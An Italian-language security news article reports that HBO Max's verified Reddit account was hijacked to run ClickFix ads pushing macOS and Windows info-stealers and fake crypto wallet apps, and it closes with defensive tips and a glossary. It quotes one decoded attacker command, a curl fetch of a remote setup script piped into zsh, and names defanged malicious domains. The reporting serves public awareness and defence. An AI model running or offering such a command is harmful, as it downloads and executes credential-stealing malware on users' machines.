
Account Reddit di HBO Max dirottato per diffondere malware ClickFix
Gli hacker hanno dirottato l'account Reddit verificato di HBO Max e hanno pubblicato 108 annunci ClickFix in due giorni, inducendo gli utenti Windows e macOS a incollare comandi che installavano malware che ruba informazioni.
I cybercriminali hanno preso il controllo dell'account ufficiale di HBO Max su Reddit e lo hanno usato per pubblicare annunci malevoli che distribuivano malware che ruba informazioni a computer Windows e macOS. I ricercatori di sicurezza di Hudson Rock e ADAMnetworks hanno analizzato la campagna e hanno riferito che l'account verificato u/hbomax è stato dirottato e utilizzato per lanciare 108 annunci malevoli in circa 48 ore. Gli annunci utilizzavano una tecnica di ingegneria sociale nota come ClickFix, in cui le vittime vengono indotte a copiare e incollare comandi in strumenti di sistema integrati come Windows Run, PowerShell o il Terminale di macOS. I comandi vengono presentati come un modo per correggere un errore, completare un CAPTCHA o installare software legittimo, ma in realtà eseguono codice controllato dagli aggressori che scarica ed esegue malware.
La tattica ClickFix è diventata più comune perché la vittima esegue volontariamente l'azione dannosa utilizzando strumenti che fanno parte del sistema operativo. Questo può aggirare alcune protezioni del browser e software di sicurezza che si concentrano sul rilevamento di download malevoli, poiché nessun file malevolo viene consegnato fino a quando il comando non viene eseguito e recupera il payload da un server remoto. In questo incidente, alcuni annunci si presentavano come promozioni per il servizio di streaming HBO Max, mentre altri pubblicizzavano falsi strumenti di intelligenza artificiale, software per sviluppatori e utilità per macOS. Hudson Rock e ADAMnetworks hanno collegato l'attività a un'operazione più ampia che chiamano PasteSwitch, che prende di mira sia macchine Windows che macOS ed è stata utilizzata per distribuire information stealer, loader, clipper di criptovalute e applicazioni contraffatte di portafogli di criptovalute. Il nome PasteSwitch si riferisce al modo in cui le vittime incollano nei loro sistemi comandi forniti dagli aggressori, mentre l'infrastruttura backend passa da una campagna all'altra, tra piattaforme, payload e metodi di furto di criptovalute a seconda del visitatore.
La campagna è stata notata per la prima volta quando un utente di Reddit ha individuato un annuncio che sembrava provenire dall'account verificato di HBO Max e promuoveva quella che sembrava un'applicazione nativa HBO Max per macOS. L'utente ha descritto di aver visto u/hbomax come autore dell'annuncio e di essersi interessato perché l'account aveva pubblicato molte volte nei subreddit ufficiali di HBO Max. Dopo aver cliccato sull'annuncio, i visitatori venivano reindirizzati a un convincente sito web falso di HBO Max, incluso uno su hbomaxx[.]us, che affermava di offrire l'app per il download. Tuttavia, premendo il pulsante di download non veniva fornito un programma di installazione. Invece, il sito mostrava istruzioni che dicevano ai visitatori di aprire il Terminale di macOS e incollare un comando per installare il software. BleepingComputer ha esaminato uno dei comandi per macOS, che utilizzava la codifica Base64 per nascondere il suo vero contenuto. Dopo la decodifica, il comando era: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh. Hudson Rock ha identificato ember-bridge[.]com come infrastruttura utilizzata a settembre per la distribuzione di malware nell'operazione PasteSwitch.
Su macOS, l'attacco distribuiva una famiglia di malware chiamata MacSync, che secondo Hudson Rock ruba credenziali salvate nel browser, profili Firefox, dati Telegram, Apple Notes e password di macOS. Una seconda catena di infezione utilizzava un componente chiamato AMOS helper, che stabilisce la persistenza creando una directory denominata .com.apple.accountsd. Una volta in atto, il malware può registrare il sistema infetto presso server controllati dagli aggressori per ricevere ulteriori attività. La stessa campagna pubblicitaria distribuiva anche false applicazioni di portafogli di criptovalute Ledger, Trezor Suite ed Exodus, destinate a rubare le frasi di recupero dei portafogli delle vittime, che sono le parole segrete che ripristinano l'accesso a un portafoglio di criptovalute. Su Windows, PasteSwitch mostrava istruzioni che portavano le vittime a eseguire comandi con mshta e PowerShell. Hudson Rock ha descritto una catena di attacco Windows che utilizzava un file poliglotta MP3/HTA per creare un'attività pianificata, avviare PowerShell a 32 bit, disabilitare l'Antimalware Scan Interface di Microsoft e generare infrastruttura specifica per la vittima in base al nome del computer e al nome utente. Le fasi successive si basavano su PowerShell offuscato e shellcode per caricare uno stealer chiamato Amatera direttamente in memoria, senza salvare il payload finale su disco.
L'annuncio di HBO Max faceva parte di una campagna pubblicitaria molto più ampia gestita attraverso l'account Reddit compromesso. I ricercatori hanno identificato 40 annunci che puntavano a hbomaxx[.]app, 36 che promuovevano il falso sito di AI e sviluppo codex-craft[.]com, 15 che promuovevano apple.clean-disk-guide[.]com, 11 che puntavano a code-desktop[.]com e sei che promuovevano hbomax-macos[.]com. Questo ha permesso ai criminali di prendere di mira molti più utenti oltre a quelli di HBO Max, raggiungendo anche sviluppatori e persone in cerca di software di intelligenza artificiale e utilità di sistema. Dopo che gli annunci malevoli sono stati segnalati, un amministratore di Reddit li ha messi in pausa e li ha segnalati ai team di Sicurezza e Protezione di Reddit. Non è chiaro come gli aggressori abbiano ottenuto l'accesso all'account Reddit di HBO Max né se altri account o sistemi di HBO o Warner Bros. Discovery siano stati colpiti. BleepingComputer ha contattato HBO e Warner Bros. Discovery con domande sull'incidente ma non ha ricevuto risposta.
Per i proprietari di siti web, le aziende e gli utenti Internet di tutti i giorni, questo incidente è un promemoria del fatto che un badge verificato o un nome di marca familiare non rendono sicuro un annuncio online o un link di download. Gli attacchi ClickFix sono particolarmente pericolosi perché chiedono alla vittima di eseguire un comando manualmente, il che colloca l'azione al di fuori del normale percorso di scansione dei file utilizzato da molte protezioni endpoint. La difesa più forte è non incollare mai un comando da un sito web nel Terminale, in PowerShell o nella finestra di dialogo Esegui, a meno che non si capisca esattamente cosa fa e non si sia confermata la fonte in modo indipendente. Lavorare con un partner infrastrutturale e di consulenza orientato alla sicurezza come AEU-I può aiutare le aziende a rivedere i controlli endpoint e di rete contro gli attacchi paste-and-run, ma nessun servizio tecnico sostituisce la necessità di consapevolezza e verifica da parte dell'utente prima di eseguire comandi.
Come Proteggerti
- Non copiare e incollare mai un comando da un sito web nella riga di comando del tuo computer, non importa quanto la pagina sembri ufficiale.
- Se un annuncio o un sito ti dice di correggere un errore o verificare un CAPTCHA incollando del testo, chiudi la pagina e vai direttamente al sito ufficiale digitando tu stesso l'indirizzo.
- Prima di scaricare qualsiasi app, controlla attentamente l'indirizzo web e cerca piccoli errori di ortografia o lettere in più come hbomaxx.us invece di hbomax.com.
- Mantieni aggiornati il sistema operativo e il browser e usa uno strumento di sicurezza in grado di bloccare i siti web malevoli noti.
- Se usi un portafoglio di criptovalute, non inserire mai la tua frase di recupero in nessuna app o sito web a meno che tu non sia assolutamente sicuro di aver installato il portafoglio ufficiale.
- Segnala annunci o post sospetti sulle piattaforme social usando la funzione di segnalazione della piattaforma.
I Termini Spiegati
- ClickFix Una tecnica truffaldina in cui i criminali ingannano le persone inducendole a incollare ed eseguire un comando sul proprio computer, che installa malware invece di risolvere un problema.
- Malware Abbreviazione di software malevolo, un programma progettato per danneggiare o prendere il controllo di un dispositivo o rubare dati.
- Base64 Un modo per trasformare testo o dati in un insieme confuso di lettere, numeri e simboli, così è più difficile per le persone capire cosa dicono davvero.
- PowerShell Uno strumento integrato di Windows che consente agli utenti di eseguire comandi, spesso usato dagli hacker perché è considerato affidabile dal sistema.
- Cryptocurrency wallet Un software o un dispositivo hardware che conserva le chiavi segrete necessarie per usare denaro digitale come Bitcoin.
- Info-stealer Un tipo di malware che raccoglie password salvate, cookie e altri dati privati da un computer infetto.